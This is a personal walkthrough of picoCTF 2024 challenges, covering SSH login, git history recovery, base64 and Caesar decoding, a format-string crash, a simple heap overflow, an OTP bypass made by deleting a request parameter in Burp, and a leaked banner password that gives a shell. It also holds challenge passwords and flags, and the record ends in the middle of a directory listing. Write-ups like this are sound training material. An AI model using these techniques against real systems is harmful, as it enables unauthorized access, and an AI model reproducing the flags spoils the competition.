picoCTF2024

Super SSH 

Description 

Using a Secure Shell (SSH) is going to be pretty important.Can you ssh as ctf-player to titan.picoctf.net at port 57256 to get the flag?You'll also need the password 6abf4a82. If asked, accept the fingerprint with yes.If your device doesn't have a shell, you can use: https://webshell.picoctf.orgIf you're not sure what a shell is, check out our Primer: https://primer.picoctf.com/#_the_shell 

┌──(kali㉿kali)-[~] 

└─$ ssh ctf-player@titan.picoctf.net -p 57256 

The authenticity of host '[titan.picoctf.net]:57256 ([3.139.174.234]:57256)' can't be established. 

ED25519 key fingerprint is SHA256:4S9EbTSSRZm32I+cdM5TyzthpQryv5kudRP9PIKT7XQ. 

This key is not known by any other names. 

Are you sure you want to continue connecting (yes/no/[fingerprint])? yes 

Warning: Permanently added '[titan.picoctf.net]:57256' (ED25519) to the list of known hosts. 

ctf-player@titan.picoctf.net's password:  

Welcome ctf-player, here's your flag: picoCTF{s3cur3_c0nn3ct10n_65a7a106} 

Connection to titan.picoctf.net closed. 

picoCTF{s3cur3_c0nn3ct10n_65a7a106} 

Bookmarklet 

Description 

Why search for the flag when I can make a bookmarklet to print it for me? Browse here, and find the flag! 

Once goes to the webpage, receive the following code: 

javascript:(function() { 

         var encryptedFlag = "àÒÆަȬë٣֖ÓÚåÛÑ¢ÕӖ¡›ÒŤ›í"; 

         var key = "picoctf"; 

         var decryptedFlag = ""; 

         for (var i = 0; i < encryptedFlag.length; i++) { 

                decryptedFlag += String.fromCharCode((encryptedFlag.charCodeAt(i) - key.charCodeAt(i % key.length) + 256) % 256); 

         } 

         alert(decryptedFlag); 

     })(); 

Not sure what to do, I asked ChatGPT by copying the above code to chat: 

It looks like you've provided a JavaScript code snippet that aims to decrypt an encrypted flag using a simple Caesar cipher with a key "picoctf". However, the decryption algorithm seems incorrect, as it attempts to subtract the key character from the encrypted flag character directly. Let me correct the code for you: 

javascriptCopy code 

(function() {
    var encryptedFlag = "àÒÆަȬë٣֖ÓÚåÛÑ¢ÕӖ¡›ÒŤ›í";
    var key = "picoctf";
    var decryptedFlag = "";
    for (var i = 0; i < encryptedFlag.length; i++) {
        decryptedFlag += String.fromCharCode((encryptedFlag.charCodeAt(i) - key.charCodeAt(i % key.length) + 256) % 256);
}
    alert(decryptedFlag);
})();
 

This corrected code attempts to decrypt the flag by subtracting the ASCII value of the corresponding key character from the ASCII value of the encrypted flag character, then applying modulo 256 to ensure the result stays within the ASCII character range. Let me know if you need further assistance or if you want to discuss something else! 

how to run this javascript code? 

ChatGPT 

ChatGPT 

To run this JavaScript code, you can follow these steps: 

Open a Web Browser: You'll need a web browser to execute JavaScript code. 

Open Developer Tools: Most modern web browsers have built-in developer tools that allow you to execute JavaScript code. You can typically open these tools by pressing F12 or Ctrl+Shift+I (Cmd+Option+I on Mac) on your keyboard. This will open the Developer Console. 

Navigate to the Console Tab: In the Developer Tools, you'll find various tabs. Navigate to the "Console" tab. This is where you can input and execute JavaScript code. 

Paste the Code: Once you're in the Console tab, you can simply paste the JavaScript code into the console. 

Run the Code: After pasting the code, press Enter to execute it. The code will run, and if there are no errors, it will display an alert with the decrypted flag. 

Following the instruction and you get the code: 

picoCTF{p@g3_turn3r_0148cb05} 

Commitment Issues 

AUTHOR: JEFFERY JOHN 

Description 

I accidentally wrote the flag down. Good thing I deleted it!You download the challenge files here: 

• challenge.zip 

Download the file, unzip it and look around. It is a git repository with a message file. 

Try to search for pico in the entire folder: 

┌──(kali㉿kali)-[~/Downloads/drop-in] 

└─$ grep -R -i pico .   

./.git/logs/refs/heads/master:0000000000000000000000000000000000000000 87b85d7dfb839b077678611280fa023d76e017b8 picoCTF <ops@picoctf.com> 1710201977 +0000commit (initial): create flag 

./.git/logs/refs/heads/master:87b85d7dfb839b077678611280fa023d76e017b8 8dc51806c760dfdbb34b33a2008926d3d8e8ad49 picoCTF <ops@picoctf.com> 1710201977 +0000commit: remove sensitive info 

./.git/logs/HEAD:0000000000000000000000000000000000000000 87b85d7dfb839b077678611280fa023d76e017b8 picoCTF <ops@picoctf.com> 1710201977 +0000    commit (initial): create flag 

./.git/logs/HEAD:87b85d7dfb839b077678611280fa023d76e017b8 8dc51806c760dfdbb34b33a2008926d3d8e8ad49 picoCTF <ops@picoctf.com> 1710201977 +0000    commit: remove sensitive info 

************************* 

The log shows there was a commit that created the flag. So the question is how to recover the old stage to go back to that commit? 

https://primer.picoctf.org/#_git_version_control 

Asked chatGPT again: 

I have this git log "./.git/logs/refs/heads/master:0000000000000000000000000000000000000000 87b85d7dfb839b077678611280fa023d76e017b8 picoCTF <ops@picoctf.com> 1710201977 +0000commit (initial): create flag". How can I go back to this old commit? 

ChatGPT 

To go back to an old commit in Git, you need to use the commit hash or a relative reference to that commit. In your case, the commit hash is 87b85d7dfb839b077678611280fa023d76e017b8. You can follow these steps to go back to this old commit: 

Checkout the Commit: Run the following command in your terminal or Git Bash: 

Copy code 

git checkout 87b85d7dfb839b077678611280fa023d76e017b8
 

This command will switch your repository to the state it was at that specific commit. 

git checkout 87b85d7dfb839b077678611280fa023d76e017b8 

******************************* 

┌──(kali㉿kali)-[~/Downloads/drop-in] 

└─$ git checkout 87b85d7dfb839b077678611280fa023d76e017b8 

Note: switching to '87b85d7dfb839b077678611280fa023d76e017b8'. 

You are in 'detached HEAD' state. You can look around, make experimental 

changes and commit them, and you can discard any commits you make in this 

state without impacting any branches by switching back to a branch. 

If you want to create a new branch to retain commits you create, you may 

do so (now or later) by using -c with the switch command. Example: 

  git switch -c <new-branch-name> 

Or undo this operation with: 

  git switch - 

Turn off this advice by setting config variable advice.detachedHead to false 

HEAD is now at 87b85d7 create flag 

┌──(kali㉿kali)-[~/Downloads/drop-in] 

└─$ ls -al 

total 16 

drwxr-xr-x 3 kali kali 4096 Apr 12 14:56 . 

drwxr-xr-x 3 kali kali 4096 Apr 12 14:44 .. 

drwxr-xr-x 8 kali kali 4096 Apr 12 14:56 .git 

-rw-r--r-- 1 kali kali   27 Apr 12 14:56 message.txt 

┌──(kali㉿kali)-[~/Downloads/drop-in] 

└─$ cat message.txt  

picoCTF{s@n1t1z3_ea83ff2a} 

┌──(kali㉿kali)-[~/Downloads/drop-in] 

└─$

interencdec 

AUTHOR: NGIRIMANA SCHADRACK 

Description 

Can you get the real meaning from this file.Download the file here. 

┌──(kali㉿kali)-[~/Downloads/pico] 

└─$ cat enc_flag    

YidkM0JxZGtwQlRYdHFhR3g2YUhsZmF6TnFlVGwzWVROclh6YzRNalV3YUcxcWZRPT0nCg== 

┌──(kali㉿kali)-[~/Downloads/pico] 

└─$ cat enc_flag | base64 -d 

b'd3BqdkpBTXtqaGx6aHlfazNqeTl3YTNrXzc4MjUwaG1qfQ==' 

┌──(kali㉿kali)-[~/Downloads/pico] 

└─$ echo d3BqdkpBTXtqaGx6aHlfazNqeTl3YTNrXzc4MjUwaG1qfQ== | base64 -d 

wpjvJAM{jhlzhy_k3jy9wa3k_78250hmj}  

This is a caesar cipher, decode it and get: 

picoCTF{caesar_d3cr9pt3d_78250afc} 

Time machine 

AUTHOR: JEFFERY JOHN 

Description 

What was I last working on? I remember writing a note to help me remember...You can download the challenge files here: 

• challenge.zip 

Just ask chatGPT, how to check commit history.  

┌──(kali㉿kali)-[~/Downloads/pico/drop-in] 

└─$ ls -al 

total 16 

drwxr-xr-x 3 kali kali 4096 Mar 11 20:07 . 

drwxr-xr-x 3 kali kali 4096 Apr 12 17:04 .. 

drwxr-xr-x 8 kali kali 4096 Mar 11 20:07 .git 

-rw-r--r-- 1 kali kali   87 Mar 11 20:07 message.txt 

┌──(kali㉿kali)-[~/Downloads/pico/drop-in] 

└─$ cat message.txt          

This is what I was working on, but I'd need to look at my commit history to know why...                                                                              

┌──(kali㉿kali)-[~/Downloads/pico/drop-in] 

└─$ git log                                               

commit 10228f3d6437701ef5aaac04213757031f30ebec (HEAD -> master) 

Author: picoCTF <ops@picoctf.com> 

Date:   Tue Mar 12 00:07:24 2024 +0000 

    picoCTF{t1m3m@ch1n3_8defe16a} 

Webdecode  

AUTHOR: NANA AMA ATOMBO-SACKEY 

Description 

Do you know how to use the web inspector?Start searching here to find the flag 

Go to the website, check the web traffic, notice inside about.html there is a value: 

<section class="about" notify_true="cGljb0NURnt3ZWJfc3VjYzNzc2Z1bGx5X2QzYzBkZWRfMDdiOTFjNzl9"> 

   <h1> 

┌──(kali㉿kali)-[~/Downloads/pico/drop-in] 

└─$ echo cGljb0NURnt3ZWJfc3VjYzNzc2Z1bGx5X2QzYzBkZWRfMDdiOTFjNzl9 | base64 -d 

picoCTF{web_succ3ssfully_d3c0ded_07b91c79} 

format string 0 

Description 

Can you use your knowledge of format strings to make the customers happy? Download the binary here. Download the source here.Connect with the challenge instance here:nc mimas.picoctf.net 63677 

https://www.fabbbe.se/blog/all_the_format_strings.html  

I thought this should be an easy one, so just followed the same method from 2022 picoCTF, but it didn't work. 

Later, I read the code again.  

   char choice1[BUFSIZE]; 

    scanf("%s", choice1); 

char *menu1[3] = {"Breakf@st_Burger", "Gr%114d_Cheese", "Bac0n_D3luxe"}; 

if (!on_menu(choice1, menu1, 3)) { 

        printf("%s", "There is no such burger yet!\n"); 

        fflush(stdout); 

} else { 

So it expects an input from one of the three options from menu1[3], I missed this part last time. 

The input you enter will have format string %114d for the first question, and %s%s%s in the second input. 

So the purpose of this challenge is to test if you understand what kind of format strings can be used in attack. 

┌──(kali㉿kali)-[~/Downloads/pico] 

└─$ nc mimas.picoctf.net 63677 

Welcome to our newly-opened burger place Pico 'n Patty! Can you help the picky customers find their favorite burger? 

Here comes the first customer Patrick who wants a giant bite. 

Please choose from the following burgers: Breakf@st_Burger, Gr%114d_Cheese, Bac0n_D3luxe 

Enter your recommendation: Gr%114d_Cheese 

Gr                                                                                                       4202954_Cheese 

Good job! Patrick is happy! Now can you serve the second customer? 

Sponge Bob wants something outrageous that would break the shop (better be served quick before the shop owner kicks you out!) 

Please choose from the following burgers: Pe%to_Portobello, $outhwest_Burger, Cla%sic_Che%s%steak 

Enter your recommendation: Cla%sic_Che%s%steak 

ClaCla%sic_Che%s%steakic_Che(null) 

picoCTF{7h3_cu570m3r_15_n3v3r_SEGFAULT_c8362f05} 

heap 0 

Description 

Are overflows just a stack concern? Download the binary here.Download the source here.Connect with the challenge instance here:nc tethys.picoctf.net 54352 

I download the code, ask ChatGPT if there is heap overflow. And ask him: 

how can I verify the heap overflow in the original code? 

1. Trigger the Heap Overflow: Choose option 2 from the menu to write to the buffer. Enter input that exceeds the allocated size for input_data, which is INPUT_DATA_SIZE - 1 characters. For example, you can enter a string longer than 4 characters. 

2. Observe the Behavior: After entering the input, observe the behavior of the program. If there is no error message or unexpected behavior, it indicates that the program may have successfully handled the overflow. However, if the program crashes, behaves unexpectedly, or exhibits memory corruption, it suggests the presence of a heap overflow vulnerability. 

I tested it on local box first: 

1. Print Heap:      (print the current state of the heap) 

2. Write to buffer: (write to your own personal block of data on the heap) 

3. Print safe_var:  (I'll even let you look at my variable on the heap, I'm confident it can't be modified) 

4. Print Flag:      (Try to print the flag, good luck) 

5. Exit 

Enter your choice: 2 

Data for buffer: ytyutjgjhgjhgjhgjjjjjjjjjjjjjjjjjjjjjjjjjjj 

1. Print Heap:      (print the current state of the heap) 

2. Write to buffer: (write to your own personal block of data on the heap) 

3. Print safe_var:  (I'll even let you look at my variable on the heap, I'm confident it can't be modified) 

4. Print Flag:      (Try to print the flag, good luck) 

5. Exit 

Enter your choice: 1 

Heap State: 

+-------------+----------------+ 

[*] Address   ->   Heap Data    

+-------------+----------------+ 

[*]   0x55c33916f6b0  ->   ytyutjgjhgjhgjhgjjjjjjjjjjjjjjjjjjjjjjjjjjj 

+-------------+----------------+ 

[*]   0x55c33916f6d0  ->   jjjjjjjjjjj 

+-------------+----------------+ 

1. Print Heap:      (print the current state of the heap) 

2. Write to buffer: (write to your own personal block of data on the heap) 

3. Print safe_var:  (I'll even let you look at my variable on the heap, I'm confident it can't be modified) 

4. Print Flag:      (Try to print the flag, good luck) 

5. Exit 

Enter your choice: 3 

Take a look at my variable: safe_var = jjjjjjjjjjj 

1. Print Heap:      (print the current state of the heap) 

2. Write to buffer: (write to your own personal block of data on the heap) 

3. Print safe_var:  (I'll even let you look at my variable on the heap, I'm confident it can't be modified) 

4. Print Flag:      (Try to print the flag, good luck) 

5. Exit 

Enter your choice: 4 

YOU WIN 

zsh: segmentation fault  ./chall 

Let me try on the remote CTF machine: 

┌──(kali㉿kali)-[~/Downloads/pico] 

└─$ nc tethys.picoctf.net 54352 

Welcome to heap0! 

I put my data on the heap so it should be safe from any tampering. 

Since my data isn't on the stack I'll even let you write whatever info you want to the heap, I already took care of using malloc for you. 

Heap State: 

+-------------+----------------+ 

[*] Address   ->   Heap Data    

+-------------+----------------+ 

[*]   0x5dd6bb01f2b0  ->   pico 

+-------------+----------------+ 

[*]   0x5dd6bb01f2d0  ->   bico 

+-------------+----------------+ 

1. Print Heap:      (print the current state of the heap) 

2. Write to buffer: (write to your own personal block of data on the heap) 

3. Print safe_var:  (I'll even let you look at my variable on the heap, I'm confident it can't be modified) 

4. Print Flag:      (Try to print the flag, good luck) 

5. Exit 

Enter your choice: 2 

Data for buffer: ghfhgfhjfhghghhhhhhhhhhhhhhhhhhhhhhhhh 

1. Print Heap:      (print the current state of the heap) 

2. Write to buffer: (write to your own personal block of data on the heap) 

3. Print safe_var:  (I'll even let you look at my variable on the heap, I'm confident it can't be modified) 

4. Print Flag:      (Try to print the flag, good luck) 

5. Exit 

Enter your choice: 3 

Take a look at my variable: safe_var = hhhhhh 

1. Print Heap:      (print the current state of the heap) 

2. Write to buffer: (write to your own personal block of data on the heap) 

3. Print safe_var:  (I'll even let you look at my variable on the heap, I'm confident it can't be modified) 

4. Print Flag:      (Try to print the flag, good luck) 

5. Exit 

Enter your choice: 4 

YOU WIN 

picoCTF{my_first_heap_overflow_1ad0e1a6} 

picoCTF{my_first_heap_overflow_1ad0e1a6} 

Scan Surprise 

Description 

I've gotten bored of handing out flags as text. Wouldn't it be cool if they were an image instead?You can download the challenge files here: 

• challenge.zip 

Additional details will be available after launching your challenge instance. 

Unzip the file and you get a QR code, scan it and you will get the flag: 

picoCTF{p33k_@_b00_b5ce2572}  

Verify 

Description 

People keep trying to trick my players with imitation flags. I want to make sure they get the real thing! I'm going to provide the SHA-256 hash and a decrypt script to help you know that my flags are legitimate.You can download the challenge files here: 

• challenge.zip 

The same files are accessible via SSH here:ssh -p 64690 ctf-player@rhea.picoctf.netUsing the password 1ad5be0d. Accept the fingerprint with yes, and ls once connected to begin. Remember, in a shell, passwords are hidden! 

• Checksum: 5848768e56185707f76c1d74f34f4e03fb0573ecc1ca7b11238007226654bcda 

• To decrypt the file once you've verified the hash, run ./decrypt.sh files/<file>. 

So, the instruction is to find the file with sha265 checksum matches the one above. Then decrypt the file with the command. 

I asked ChatGTP:  

-write a bash script that can calculate sha256 hash on all the files under the current directory on Linux. 

It gave me a script, but I cannot open vi to create a file. So, I asked it to provide me a one line script: 

can you make a one line bash? 

ChatGPT 

ChatGPT 

Sure, you can use the find command along with sha256sum to achieve this in a single line: 

Bash 

find . -type f -exec sha256sum {} + 

This command will find all files (excluding directories) in the current directory and its subdirectories, then calculate the SHA256 hash for each file found. It will output the filename along with its corresponding SHA256 hash. 

Sort the result so you can easily identify the value same to the checksum. 

ctf-player@pico-chall$ find . -type f -exec sha256sum {} + | sort 

5848768e56185707f76c1d74f34f4e03fb0573ecc1ca7b11238007226654bcda  ./8eee7195 

ctf-player@pico-chall$ cp ./8eee7195 ../. 

ctf-player@pico-chall$ cd .. 

ctf-player@pico-chall$ ls  

8eee7195  checksum.txt  decrypt.sh  files 

ctf-player@pico-chall$ decrypt.sh 8eee7195  

picoCTF{trust_but_verify_8eee7195} 

ctf-player@pico-chall$  

Blame game 

Description 

Someone's commits seems to be preventing the program from working. Who is it? You can download the challenge files here: 

• challenge.zip 

┌──(kali㉿kali)-[~/Downloads/pico/drop-in] 

└─$ cat message.py  

print("Hello, World!" 

so the python code is not correct.  

┌──(kali㉿kali)-[~/Downloads/pico/drop-in] 

└─$ ls -al 

total 16 

drwxr-xr-x 3 kali kali 4096 Mar 11 20:07 . 

drwxr-xr-x 3 kali kali 4096 Apr 16 17:27 .. 

drwxr-xr-x 8 kali kali 4096 Mar 11 20:07 .git 

-rw-r--r-- 1 kali kali   22 Mar 11 20:07 message.py 

┌──(kali㉿kali)-[~/Downloads/pico/drop-in] 

└─$ git log 

commit 572ef8669e27c6c3cb78e98733405c3c210b0b8b (HEAD -> master) 

Author: picoCTF <ops@picoctf.com> 

Date:   Tue Mar 12 00:07:13 2024 +0000 

important business work 

There are many log entries. 

Ask ChatGPT: 

how to check the author who made the last git commit 

ChatGPT 

ChatGPT 

To check the author who made the last git commit, you can use the git log command with the -1 option to display just the last commit, and then use --format to specify the output format. Here's how you can do it: 

git log -1 --format="%an <%ae>" 

This command will display the author's name and email address for the last commit in the repository. 

• %an represents the author's name. 

• %ae represents the author's email address. 

You can also use %aN for the author's name without the email address, and %aE for the author's email address without the name. 

So use this command to list the authors for past commit, and at the end you see the special one. 

┌──(kali㉿kali)-[~/Downloads/pico/drop-in] 

└─$ git log  --format="%an <%ae>" 

picoCTF <ops@picoctf.com> 

picoCTF{@sk_th3_1nt3rn_2c6bf174} <ops@picoctf.com> 

picoCTF <ops@picoctf.com> 

I feel this is probably is not the correct way to solve this problem. To be more specific, we need to find the author who commit the this python code... 

Or you can find the information at: 

/home/kali/Downloads/pico/drop-in/.git/logs/refs/heads 

Collaborative Development 

Description 

My team has been working very hard on new features for our flag printing program! I wonder how they'll work together?You can download the challenge files here: 

• challenge.zip 

┌──(kali㉿kali)-[~/Downloads/pico/drop-in] 

└─$ cat flag.py    

print("Printing the flag...") 

┌──(kali㉿kali)-[~/Downloads/pico/drop-in] 

└─$ cd .git     

┌──(kali㉿kali)-[~/Downloads/pico/drop-in/.git] 

└─$ git log                       

commit eb19d0e3c28278752f0735c4451b885136a24105 (HEAD -> main) 

Author: picoCTF <ops@picoctf.com> 

Date:   Tue Mar 12 00:07:49 2024 +0000 

    init flag printer 

┌──(kali㉿kali)-[~/Downloads/pico/drop-in/.git] 

└─$ git checkout eb19d0e3c28278752f0735c4451b885136a24105 

fatal: this operation must be run in a work tree 

┌──(kali㉿kali)-[~/Downloads/pico/drop-in/.git] 

└─$ git branch -a                                         

* (HEAD detached at eb19d0e) 

  feature/part-1 

  feature/part-2 

  feature/part-3 

  main 

┌──(kali㉿kali)-[~/Downloads/pico/drop-in/.git] 

└─$ cd main 

cd: no such file or directory: main 

┌──(kali㉿kali)-[~/Downloads/pico/drop-in/.git] 

└─$ git checkout main                                     

fatal: this operation must be run in a work tree 

┌──(kali㉿kali)-[~/Downloads/pico/drop-in/.git] 

└─$ cd ..   

┌──(kali㉿kali)-[~/Downloads/pico/drop-in] 

└─$ git checkout main 

Switched to branch 'main' 

┌──(kali㉿kali)-[~/Downloads/pico/drop-in] 

└─$ git log           

commit eb19d0e3c28278752f0735c4451b885136a24105 (HEAD -> main, yt) 

Author: picoCTF <ops@picoctf.com> 

Date:   Tue Mar 12 00:07:49 2024 +0000 

    init flag printer 

┌──(kali㉿kali)-[~/Downloads/pico/drop-in] 

└─$ ls -al 

total 16 

drwxr-xr-x 3 kali kali 4096 Mar 11 20:07 . 

drwxr-xr-x 3 kali kali 4096 Apr 16 18:03 .. 

-rw-r--r-- 1 kali kali   30 Mar 11 20:07 flag.py 

drwxr-xr-x 8 kali kali 4096 Apr 17 14:44 .git 

┌──(kali㉿kali)-[~/Downloads/pico/drop-in] 

└─$ cat flag.py  

print("Printing the flag...") 

┌──(kali㉿kali)-[~/Downloads/pico/drop-in] 

└─$ git checkout feature/part-1 

Switched to branch 'feature/part-1' 

┌──(kali㉿kali)-[~/Downloads/pico/drop-in] 

└─$ ls     

flag.py 

┌──(kali㉿kali)-[~/Downloads/pico/drop-in] 

└─$ cat flag.py  

print("Printing the flag...") 

print("picoCTF{t3@mw0rk_", end='')                                                                              

┌──(kali㉿kali)-[~/Downloads/pico/drop-in] 

└─$ git checkout feature/part-2 

Switched to branch 'feature/part-2' 

┌──(kali㉿kali)-[~/Downloads/pico/drop-in] 

└─$ cat flag.py                 

print("Printing the flag...") 

print("m@k3s_th3_dr3@m_", end='')                                                                              

┌──(kali㉿kali)-[~/Downloads/pico/drop-in] 

└─$ git checkout feature/part-3 

Switched to branch 'feature/part-3' 

┌──(kali㉿kali)-[~/Downloads/pico/drop-in] 

└─$ cat flag.py                 

print("Printing the flag...") 

print("w0rk_2c91ca76}") 

┌──(kali㉿kali)-[~/Downloads/pico/drop-in] 

└─$  

So in this challenge, there are three branches and you need to put all three pieces from them together. 

picoCTF{t3@mw0rk_m@k3s_th3_dr3@m_w0rk_2c91ca76} 

binhexa 

AUTHOR: NANA AMA ATOMBO-SACKEY 

Description 

How well can you perfom basic binary operations? Start searching for the flag here nc titan.picoctf.net 63103 

┌──(kali㉿kali)-[~/Downloads/pico] 

└─$ nc titan.picoctf.net 63103 

Welcome to the Binary Challenge!" 

Your task is to perform the unique operations in the given order and find the final result in hexadecimal that yields the flag. 

Binary Number 1: 00111100 

Binary Number 2: 01101010 

Question 1/6: 

Operation 1: '>>' 

Perform a right shift of Binary Number 2 by 1 bits . 

Enter the binary result: 00110101 

Correct! 

Question 2/6: 

Operation 2: '+' 

Perform the operation on Binary Number 1&2. 

Enter the binary result: 10100110 

Correct! 

Question 3/6: 

Operation 3: '*' 

Perform the operation on Binary Number 1&2. 

Enter the binary result: 1100011011000 

Correct! 

Question 4/6: 

Operation 4: '&' 

Perform the operation on Binary Number 1&2. 

Enter the binary result: 00101000 

Correct! 

Question 5/6: 

Operation 5: '<<' 

Perform a left shift of Binary Number 1 by 1 bits. 

Enter the binary result: 01111000 

Correct! 

Question 6/6: 

Operation 6: '|' 

Perform the operation on Binary Number 1&2. 

Enter the binary result: 01111110 

Correct! 

Enter the results of the last operation in hexadecimal: 3F2 

Incorrect answer! 

Enter the results of the last operation in hexadecimal: 7E 

Correct answer! 

The flag is: picoCTF{b1tw^3se_0p3eR@tI0n_su33essFuL_d6f8047e} 

┌──(kali㉿kali)-[~/Downloads/pico] 

CanYouSee 

Description 

How about some hide and seek?Download this file here. 

picoCTF{ME74D47A_HIDD3N_b32040b8} 

Unzip the file: 

┌──(kali㉿kali)-[~/Downloads/pico] 

└─$ strings ukn_reality.jpg | grep pico 

┌──(kali㉿kali)-[~/Downloads/pico] 

└─$ exiftool ukn_reality.jpg  

ExifTool Version Number     : 12.57 

File Name                   : ukn_reality.jpg 

Directory                   : . 

File Size                   : 2.3 MB 

File Modification Date/Time : 2024:03:11 20:05:53-04:00 

File Access Date/Time       : 2024:04:17 15:02:29-04:00 

File Inode Change Date/Time : 2024:04:17 15:02:29-04:00 

File Permissions            : -rw-r--r-- 

File Type                   : JPEG 

File Type Extension         : jpg 

MIME Type                   : image/jpeg 

JFIF Version                : 1.01 

Resolution Unit             : inches 

X Resolution                : 72 

Y Resolution                : 72 

XMP Toolkit                 : Image::ExifTool 11.88 

Attribution URL             : cGljb0NURntNRTc0RDQ3QV9ISUREM05fYjMyMDQwYjh9Cg== 

Image Width                 : 4308 

Image Height                : 2875 

Encoding Process            : Baseline DCT, Huffman coding 

Bits Per Sample             : 8 

Color Components            : 3 

Y Cb Cr Sub Sampling        : YCbCr4:2:0 (2 2) 

Image Size                  : 4308x2875 

Megapixels                  : 12.4 

┌──(kali㉿kali)-[~/Downloads/pico] 

└─$ echo cGljb0NURntNRTc0RDQ3QV9ISUREM05fYjMyMDQwYjh9Cg== | base64 -d 

picoCTF{ME74D47A_HIDD3N_b32040b8} 

IntroToBurp 

Description 

Try here to find the flag 

Use burp to intercept the traffic. The first step is to enter some data for registration, the second step is to enter data for OTP.  

In the second step, intercept the traffic and simply delete the opt=data line and you will see the flag. 

(this is not a good exercise) 

Welcome, tyutu you sucessfully bypassed the OTP request. Your Flag: picoCTF{#0TP_Bypvss_SuCc3$S_e1eb16ed} 

Secret of the Polyglot 

Description 

The Network Operations Center (NOC) of your local institution picked up a suspicious file, they're getting conflicting information on what type of file it is. They've brought you in as an external expert to examine the file. Can you extract all the information from this strange file?Download the suspicious file here. 

Download the file, click to open as pdf and you can see partial flag as: 

1n_pn9_&_pdf_1f991f77} 

Check file type: 

┌──(kali㉿kali)-[~/Downloads/pico] 

└─$ file flag2of2-final.pdf 

flag2of2-final.pdf: PNG image data, 50 x 50, 8-bit/color RGBA, non-interlaced 

It shows up as a png, make a copy 

┌──(kali㉿kali)-[~/Downloads/pico] 

└─$ cp flag2of2-final.pdf flag2png.png 

 and open the png file, you will see another part of the flag: 

picoCTF{f1u3n7_ 

picoCTF{f1u3n7_1n_pn9_&_pdf_1f991f77} 

Unminify 

Description 

I don't like scrolling down to read the code of my website, so I've squished it. As a bonus, my pages load faster! Browse here, and find the flag! 

Just use burp to intercept the traffic, or view page source, you will find the flag: 

picoCTF{pr3tty_c0d3_dbe259ce} 

Binary Search 

Description 

Want to play a game? As you use more of the shell, you might be interested in how they work! Binary search is a classic algorithm used to quickly find an item in a sorted list. Can you find the flag? You'll have 1000 possibilities and only 10 guesses. Cyber security often has a huge amount of data to look through - from logs, vulnerability reports, and forensics. Practicing the fundamentals manually might help you in the future when you have to write your own tools!You can download the challenge files here: 

• challenge.zip 

Additional details will be available after launching your challenge instance. 

$ ssh -p 54277 ctf-player@atlas.picoctf.net 

ctf-player@atlas.picoctf.net's password:  

Permission denied, please try again. 

ctf-player@atlas.picoctf.net's password:  

Welcome to the Binary Search Game! 

I'm thinking of a number between 1 and 1000. 

Enter your guess: 500 

Higher! Try again. 

Enter your guess: 750 

Lower! Try again. 

Enter your guess: 625 

Lower! Try again. 

Enter your guess: 562 

Higher! Try again. 

Enter your guess: 593 

Higher! Try again. 

Enter your guess: 609 

Higher! Try again. 

Enter your guess: 617 

Congratulations! You guessed the correct number: 617 

Here's your flag: picoCTF{g00d_gu355_3af33d18} 

Connection to atlas.picoctf.net closed. 

endianness 

Description 

Know of little and big endian? Source nc titan.picoctf.net 55885 

┌──(kali㉿kali)-[~/Downloads/pico] 

└─$ nc titan.picoctf.net 55885 

Welcome to the Endian CTF! 

You need to find both the little endian and big endian representations of a word. 

If you get both correct, you will receive the flag. 

Word: cmckz 

Enter the Little Endian representation: 7A6B636D63 

Correct Little Endian representation! 

Enter the Big Endian representation: 636D636B7A 

Correct Big Endian representation! 

Congratulations! You found both endian representations correctly! 

Your Flag is: picoCTF{3ndi4n_sw4p_su33ess_02999450} 

https://levelup.gitconnected.com/little-endian-and-big-endian-74ab6441b2a7  

picoCTF{3ndi4n_sw4p_su33ess_02999450} 

dont-you-love-banners 

Description 

Can you abuse the banner?The server has been leaking some crucial information on tethys.picoctf.net 55191. Use the leaked information to get to the server.To connect to the running application use nc tethys.picoctf.net 63833. From the above information abuse the machine and find the flag in the /root directory. 

┌──(kali㉿kali)-[~/Downloads/pico] 

└─$ nc tethys.picoctf.net 55191 

SSH-2.0-OpenSSH_7.6p1 My_Passw@rd_@1234 

^C 

┌──(kali㉿kali)-[~/Downloads/pico] 

└─$ nc tethys.picoctf.net 63833         

************************************* 

**************WELCOME**************** 

************************************* 

what is the password?  

My_Passw@rd_@1234 

What is the top cyber security conference in the world? 

RSA 

Lol, good try, try again and good luck 

What is the top cyber security conference in the world? 

RSA Conference 

Lol, good try, try again and good luck 

What is the top cyber security conference in the world? 

BlackHat 

Lol, good try, try again and good luck 

What is the top cyber security conference in the world? 

DEF CON 

the first hacker ever was known for phreaking(making free phone calls), who was it? 

John Draper 

player@challenge:~$ ls -al 

ls -al 

total 20 

drwxr-xr-x 1 player player   20 Mar  9 16:39 . 

drwxr-xr-x 1 root   root 20 Mar  9 16:39 .. 

-rw-r--r-- 1 player player  220 Apr  4  2018 .bash_logout 

-rw-r--r-- 1 player player 3771 Apr  4  2018 .bashrc 

-rw-r--r-- 1 player player  807 Apr  4  2018 .profile 

-rw-r--r-- 1 player player  114 Feb  7 17:25 banner 

-rw-r--r-- 1 root   root 13 Feb  7 17:25 text 

player@challenge:~$ cat text     

cat text 

keep digging 

player@challenge:~$ history 

history 

1  ls -al 

2  cat text 

3  history 

player@challenge:~$ cat banner 

cat banner 

************************************* 

**************WELCOME**************** 

************************************* 

player@challenge:~$ cd .. 

cd .. 

player@challenge:/home$ ls -al 

ls -al 

total 0 

drwxr-xr-x 1 root   root   20 Mar  9 16:39 . 

drwxr-xr-x 1 root   root   29 Apr 19 18:54 .. 

drwxr-xr-x 1 player player 20 Mar  9 16:39 player 

player@challenge:/home$ cd / 

cd / 

player@challenge:/$ pwd 

pwd 

/ 

player@challenge:/$ ls -al 

ls -al 

total 4 

drwxr-xr-x   1 root   root  29 Apr 19 18:54 . 

drwxr-xr-x   1 root   root  29 Apr 19 18:54 .. 

-rwxr-xr-x   1 root   root   0 Apr 19 18:54 .dockerenv 

drwxr-xr-x   1 root   root 4096 Mar  9 16:38 bin 

drwxr-xr-x   2 root   root   6 Apr 24  2018 boot 

d---------   1 root   root  42 Mar  9 16:39 challenge 

drwxr-xr-x   5 root   root 340 Apr 19 18:54 dev 

drwxr-xr-x   1 root   root  66 Apr 19 18:54 etc 

drwxr-xr-x   1 root   root  20 Mar  9 16:39 home 

drwxr-xr-x   1 root   root  86 Mar  9 16:38 lib 

drwxr-xr-x   2 root   root  34 May 30  2023 lib64 

drwxr-xr-x   2 root   root   6 May 30  2023 media 

drwxr-xr-x   2 root   root   6 May 30  2023 mnt 

drwxr-xr-x   2 root   root   6 May 30  2023 opt 

dr-xr-xr-x 206 nobody nogroup 0 Apr 19 18:54 proc 

drwxr-xr-x   1 root   root   6 Mar  9 16:39 root 

